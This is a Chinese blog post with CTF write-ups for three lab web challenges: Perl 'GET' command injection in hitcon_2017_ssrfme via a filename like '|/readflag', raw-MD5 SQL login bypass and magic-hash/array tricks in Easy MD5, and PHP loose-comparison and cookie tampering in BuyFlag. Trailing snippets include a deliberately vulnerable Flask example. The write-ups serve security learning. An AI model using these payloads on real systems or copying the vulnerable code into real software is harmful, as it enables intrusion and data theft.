hitcon_2017_ssrfme、[BJDCTF2020]Easy MD5、[极客大挑战 2019]BuyFlag

最新推荐文章于 2023-07-29 20:30:52 发布
最新推荐文章于 2023-07-29 20:30:52 发布
阅读量714 收藏 1
点赞数
分类专栏: ctf刷题纪 文章标签: php perl
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52268949/article/details/130251061
版权
hitcon_2017_ssrfme

进入环境给出源码

<?php 
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) 
    {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }
    echo $_SERVER["REMOTE_ADDR"];
    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); 
    @mkdir($sandbox); 
    @chdir($sandbox); 

    $data = shell_exec("GET " . escapeshellarg($_GET["url"])); 
    $info = pathinfo($_GET["filename"]); 
    $dir  = str_replace(".", "", basename($info["dirname"])); 
    @mkdir($dir); 
    @chdir($dir); 
    @file_put_contents(basename($info["basename"]), $data); 
    highlight_file(__FILE__); 

$data = shell_exec("GET " . escapeshellarg($_GET["url"]));

这里GET一开始确实不知道有什么用,以为是get传参,但是想想又不明白,根据题解的意思应该是perl中的——一种语言

根据题解,GET应该是可以读文件的,那我在kali中试一试

在这里插入图片描述

创建一个flag文件并读取

echo flag{} > flag
GET ./flag

在这里插入图片描述

读取根目录

在这里插入图片描述

代码一开始创建了一个沙盒文件夹,路径为sandbox/加上MD5加密过后的orange加页面输出的ip

在这里插入图片描述

使用上面方法我们就可以在靶机里找flag了,一般flag在根目录下,payload

http://8e43eaf3-33d8-4fae-9336-4977010900a2.node4.buuoj.cn:81/?url=/&filename=233
http://8e43eaf3-33d8-4fae-9336-4977010900a2.node4.buuoj.cn:81/sandbox/230317844a87b41e353b096d0d6a5145/233

在这里插入图片描述

有flag和readflag但是flag读不到,多半是没有权限,只能通过readflag来实现了

GET底层实现使用的是open函数,open函数可以执行命令,我们可以通过GET来执行命令

1、open命令执行(|没搞明白)

open(FD,'|id')
print <FD>

而perl里的GET函数底层就是调用了open处理,如下84与132行

file.pm
84: opendir(D, $path) or
132:    open(F, $path) or return new

当GET使用file协议的时候就会调用到perl的open函数

在这里插入图片描述

发现了这一点我们就可以构造payload了

?url=&filename=|/readflag
?url=file:|/readflag&filename=abc
http://8e43eaf3-33d8-4fae-9336-4977010900a2.node4.buuoj.cn:81/sandbox/230317844a87b41e353b096d0d6a5145/abc

这样就能获得flag

在这里插入图片描述

[BJDCTF2020]Easy MD5

进入环境用浏览器自带的开发者工具抓一下包,发现头部有提示

在这里插入图片描述

这里查一下md5函数,当存在参数true时,使用原始16字符二进制格式,找到ffifdyop字符串经过MD5哈希之后,会变成276f722736c95d99e921722cf9ed621c,mysql会把hex当作Ascii码来解释所以这几个字符相当于:’ or '6xxxxxxx。这就相当于一个万能密码了我们来试试

成功登入然后我们查看网页源码

在这里插入图片描述

得到一些新的提示这就很明显是一个md5弱类型比较,我们到网上找一些以0e开头的md5值

在这里插入图片描述

用上图任意俩个值分别别传给a和b(通过get方式)给出如下payload

?a=QNKCDZO&b=240610708

然后又得到部分源码

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

在这里需要通过Post方式传入两个值,并且这两个值要求不相等且md5加密后要全等,这就又有个矛盾了,这里有嘚用一次md5弱类型比较,给这俩个值当成数组赋值这样一来就能成功绕过(如果这里不懂md5弱类型比较建议百度一下

我这里使用curl传送payload

curl -d "param1[]=1&param2[]=2" -s "http://5d01309a-5251-4791-b9b3-ee9c1facee0e.node4.buuoj.cn:81/levell14.php"

成功取得flag

在这里插入图片描述

[极客大挑战 2019]BuyFlag

进入环境点击menu后点击payflag然后我们查看网页源代码发现一些提示

<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->

需要post传入一个password我们既要password不能为数字且password需要为404,但是在这里我们看见比较符号为==所以这里可以使用弱类型绕过我们传入404b即可绕过过滤

在这里我们用bp抓完包我们注意这里需要更改

在这里插入图片描述

默认这里是0我们需要改为1

在这里插入图片描述

password传入值,但是发包回显钱不够

在这里插入图片描述

这里可以猜测一下钱的变量为money我们尝试更改钱的数量

在这里插入图片描述

在这里插入图片描述

数字太长我们尝试一下科学计数法

在这里插入图片描述

在这里插入图片描述

这样我们就能获得flag

BMZCTF hitcon_2017_ssrfme
qq_26243045的博客
11-26 746
考点:perl脚本open命令执行 打开题目显示如下代码 将GET请求到的数据保存在我们自定义的文件名当中。 给url参数传递/可以查看根目录下的内容 Perl的open函数执行会执行给open函数所传递的文件名参数中的系统命令,但是前提是这个文件名是需要存在的。 这道题因为文件名是可以控制的,所以就先生成一个以读取flag命令命名的文件 然后使用file协议去读取文件 访问即可获得flag ...
houseoforange_hitcon_2016
fayinq的博客
04-07 348
houseoforange_hitcon_2016 先检查保护 保护全开 FSOP:对于_IO_FILE_plus结构体的利用 首先,在分析这个题目之前,我们需要知道两个知识点,一个是_IO_FILE_plus,一个是FSOP _IO_FILE_PLUS _IO_FILE_plus是ptmalloc中定义的一种结构体,他决定了很多东西,先在gdb里面查看一眼 在此,我们就用本次题目中会使用到的_IO_list_all结构体来作为参考。 _IO_FILE_plus 主要是由两个部分组成,其中一个是_IO
[BJDCTF2020]Easy MD5(超级详细)
weixin_73560599的博客
07-29 3951
这题涉及的知识点挺多的,包括md5($pass,true)的注入,php的弱类型比较以及强类型比较 尤其是MD5的注入 非常有意思涉及的内容挺多,开阔视野以及知识
[BJDCTF2020]Easy MD5,[极客挑战 2019]Knife
fightte的博客
05-18 202
输入框,输入并没有任何的输出和提示。 抓包,在响应头中发现有提示: 提示后台查询语句,同时提到函数md5(xxx,true),去了解这个函数, 了解到输入ffifdyop构成漏洞, F12查看到如图的代码: <!-- $a = $GET['a']; $b = $_GET['b']; if($a != $b && md5($a) == md5($b)){ // wow, glzjin wants a girl friend. --> 传入的a变量和b变量不相等,但.
【BUUCTF】刷题总结(基础篇)
weixin_51614272的博客
05-15 2509
目录[GXYCTF2019]Ping Ping Ping[极客挑战 2019]Upload[极客挑战 2019]BabySQL[ACTF2020 新生赛]Upload[极客挑战 2019]BuyFlag[ACTF2020 新生赛]BackupFile[BJDCTF2020]Easy MD5[RoarCTF 2019]Easy Calc[HCTF 2018]admin[MRCTF2020]你传你🐎呢 [GXYCTF2019]Ping Ping Ping 知识点:命令执行 绕过: ; 来拼接命令 $I
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 7万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
CTF刷题-汇总
~airrudder~
04-09 1万+
BUUCTF平台的刷题之旅 Web
BUUCTF web writeup
stepone4ward的博客
09-11 5万+
buuctf题目的部分writeup,持续更新中
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1695
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
一道简单的流量分析
weixin_52268949的博客
11-22 5875
流量附件提取 链接:https://pan.baidu.com/s/1oHSbIFiqs6ENmqykzFkEKg 提取码:do7s 1、 使用Wireshark查看并分析attack.pcapng数据包文件,通过分析数据包attack.pcapng找出黑客的IP地址,并将黑客的IP地址作为FLAG(形式:[IP地址])提交: 我们使用http.request.method == GET这个方法来过滤一下GET请求包 发现两个登录页面的请求包一个是172.16.1.10向172.16.1.101发出的请
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2427
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到排序(升序关键字asc) P
一道关于压缩包的ctf题目(包括暴力破解,明文攻击,伪加密)
weixin_52268949的博客
01-27 2373
关于题目附件 链接:https://pan.baidu.com/s/1PRshlizSndkgxkslnqJrHA 提取码:p76e zip三连击 下载附件得到题目 手机号码一般是11位,那么我们设置暴力破解范围为19900000000-19999999999,破解得到密码 在第一个压缩包成功解压后我们又得到提示 这时我们去看加密压缩包和已经解密的压缩包的crc 意外发现readme.txt的crc竟然相同,那么我们可以采用明文攻击 等待明文爆破完毕将压缩包保存即可获得不需要密码的压缩包,然后这题
[GXYCTF2019]Ping Ping Ping
weixin_52268949的博客
02-07 2365
[GXYCTF2019]Ping Ping Ping 进入环境输个ip发现就是在ping这个ip地址,我们尝试使用分号来执行命令 发现flag.php可惜不能直接cat flag.php估计绊掉了,那我们cat index.php看看还是不行,尝试绕过了一下空格,原来空格也过滤了,这样一来源码就出来了 ?ip=127.0.0.1;cat$IFS$9index.php 源码如下 /?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo pr
攻防世界 easytornado
weixin_52268949的博客
02-23 2127
easytornado 进入环境就这样子 我们逐一访问看看 进入flag.txt提示flag in /fllllllllllllag我们访问fllllllllllllag看看 报了一个error,且在浏览器有回显,莫非是模板注入,我们试一试,把error换成456看看浏览器回显 确定有模板注入了但是这里没有更多信息我们只能先放一放了 然后我们去访问welcome.txt看看 第二个是一个render,render是一个Tomado框架的一个渲染函数,即可以通过传递不同的参数形成不同的页面。 还有个
hitcon_2017_ssrfme
weixin_52268949的博客
01-06 2032
hitcon_2017_ssrfme 进入环境给出源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_AD
攻防世界 unserialize3
weixin_52268949的博客
01-28 1509
unserialize3 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } ?code= 进入题目给出部分代码,注意发现到有个wakeup()函数,我们要想办法绕过这个函数,wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这也算是一个绕过点 我们编写exp class xctf { public $flag = '
DASCTF Oct吉林工师web
weixin_52268949的博客
12-26 1167
迷路的魔法少女 进入环境给出源码 <?php highlight_file('index.php'); extract($_GET); error_reporting(0); function String2Array($data) { if($data == '') return array(); @eval("\$array = $data;"); return $array; } if(is_array($attrid) && is_array($a
[HITCON 2017]SSRFme 1
最新发布
03-30
### HITCON 2017 SSRF Challenge Overview The **HITCON 2017 CTF** featured a variety of challenges, including those related to Server-Side Request Forgery (SSRF). These challenges were designed to test participants' understanding of web application vulnerabilities and their ability to exploit them effectively. One notable challenge was the **SSRFme task**, which involved exploiting an SSRF vulnerability within a PHP-based system. The provided code snippet demonstrates how the `$_SERVER['HTTP_X_FORWARDED_FOR']` variable is manipulated by splitting its value using commas as delimiters[^5]. This manipulation allows attackers to control the `$http_x_headers[0]` value, potentially leading to unauthorized access or command execution scenarios. In another instance, contestants had to leverage file-writing capabilities through GET requests combined with filename parameters[^4]. By carefully crafting filenames that included shell commands such as `/readflag`, they could execute arbitrary commands on the server side. Specifically: - A request like `/?url=/&filename=aaa` would create a new file named after the specified parameter. - Subsequent exploitation steps allowed reading sensitive files from restricted directories via crafted URLs incorporating malicious payloads into both query strings (`?`) and headers. Additionally, there exists documentation regarding similar exercises where users reconstruct past competitions’ problems locally for practice purposes&mdash;such efforts often involve setting up Docker containers mimicking original environments accurately so learners may gain hands-on experience without needing direct participation during actual events themselves[^1]. For further exploration beyond just theoretical knowledge about these types of attacks but also practical implementations thereof consider reviewing additional resources discussing advanced techniques surrounding path traversal exploits alongside other common injection vectors present throughout modern-day applications today too! ```python import os from flask import Flask, request app = Flask(__name__) @app.route('/') def index(): url = request.args.get('url', '') filename = request.args.get('filename', 'default.txt') try: response = open(url) # Vulnerable line due to lack of validation content = response.read() with open(f"/tmp/{filename}", "w") as f: f.write(content) return f"Content written successfully to {filename}" except Exception as e: return str(e), 400 if __name__ == '__main__': app.run(debug=True) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值